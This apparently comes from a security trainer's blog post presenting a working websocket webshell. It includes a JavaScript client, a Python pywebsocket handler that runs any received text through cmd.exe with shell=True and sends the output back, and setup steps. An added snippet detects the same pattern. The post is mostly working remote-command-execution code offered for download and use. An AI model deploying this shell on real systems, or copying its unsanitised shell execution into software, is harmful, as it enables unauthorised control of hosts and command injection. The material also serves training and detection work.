Simple websockets based webshell

I’m writing again after a year! It’s been an eventful one at that. Multiple conferences and two successful Xtreme Web Hacking trainings in that period.

As part of the XWH training that Akash and I did at nullcon 2015, I built an app to demo the functionality and usage of websockets. I went overboard and converted it into a full-fledged web shell.

Websocket Client

The client is a simple connect and send call to a websockets server:


function WebSocketShell()
{
    if ("WebSocket" in window)
    {
        // Host and port of the pywebsocket server, plus the handler path.
        var server = "serverip_or_hostname:9998/server";
        var ws = new WebSocket("ws://" + server);

        // Send the command as soon as the connection is open.
        ws.onopen = function()
        {
            ws.send('ipconfig');
        };

        // The server replies with the command output as a text message.
        ws.onmessage = function (evt)
        {
            var received_msg = evt.data;
            alert(received_msg);
        };

        ws.onclose = function(a)
        {
            alert('Error here');
        };
    }
    else
    {
        alert("WebSocket NOT supported by your Browser!");
    }
}

Websocket Server

The websockets server is a pywebsocket instance. The server side code is a Python script that handles the incoming connection and the text.
The text is then passed to a subprocess.Popen call to be executed on the server. The output is collected and sent back to the client via the websocket.

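import subprocess

def web_socket_transfer_data(request):
    while True:
        # Block until the client sends the next message; None means the socket closed.
        line = request.ws_stream.receive_message()
        if line is None:
            return
        if isinstance(line, unicode):
            # The received text is appended to a shell command line and executed as-is.
            proc = subprocess.Popen('cmd.exe /c ' + line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # communicate() drains both pipes together, so a large stderr cannot stall the read.
            out, err = proc.communicate()
            request.ws_stream.send_message(out + err, binary=False)
        else:
            request.ws_stream.send_message('Send plain text only!', binary=True)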
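As an added example (not part of the original post or its repository), here is a small static check a reviewer could run over Python sources to find this handler pattern: a subprocess call with shell=True whose command is built from data rather than a string literal. The sample source is constructed from the handler above, and the name find_dynamic_shell_calls is hypothetical.

```python
import ast

# Constructed sample: the handler pattern from this post, embedded as text to scan.
SAMPLE = '''
import subprocess

def web_socket_transfer_data(request):
    while True:
        line = request.ws_stream.receive_message()
        if line is None:
            return
        proc = subprocess.Popen('cmd.exe /c ' + line, shell=True,
                                stdout=subprocess.PIPE)
        request.ws_stream.send_message(proc.stdout.read(), binary=False)

def safe(request):
    subprocess.Popen(['ipconfig', '/all'])
'''

SPAWNERS = {"Popen", "call", "run", "check_call", "check_output"}

def find_dynamic_shell_calls(source):
    """Return (function, line) pairs where subprocess is invoked with
    shell=True and a command that is not a plain string literal."""
    findings = []
    tree = ast.parse(source)
    for func in ast.walk(tree):
        if not isinstance(func, ast.FunctionDef):
            continue
        for node in ast.walk(func):
            if not (isinstance(node, ast.Call)
                    and isinstance(node.func, ast.Attribute)
                    and isinstance(node.func.value, ast.Name)
                    and node.func.value.id == "subprocess"
                    and node.func.attr in SPAWNERS):
                continue
            shell_on = any(kw.arg == "shell"
                           and isinstance(kw.value, ast.Constant)
                           and kw.value.value is True
                           for kw in node.keywords)
            dynamic = bool(node.args) and not isinstance(node.args[0], ast.Constant)
            if shell_on and dynamic:
                findings.append((func.name, node.lineno))
    return findings

if __name__ == "__main__":
    for name, lineno in find_dynamic_shell_calls(SAMPLE):
        print("%s: line %d: shell=True with a non-literal command" % (name, lineno))
```

The check only recognises calls written as subprocess.X(...); aliased imports or os.system would need their own rules.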

Get it!

The code is available on GitHub: You can get it here

Usage

To run the server on port 9998 (default in the code, can be changed):

  1. Get pywebsocket
  2. Run python pywebsocket\mod_pywebsocket\standalone.py -p 9998 -w ws_server
  3. Open index.html in any browser that supports websockets. Latest Chrome/Firefox is good enough.
  4. Enter a (Windows) command like ipconfig
  5. Hit the Execute! button.
  6. Potato.

Happy Hacking!
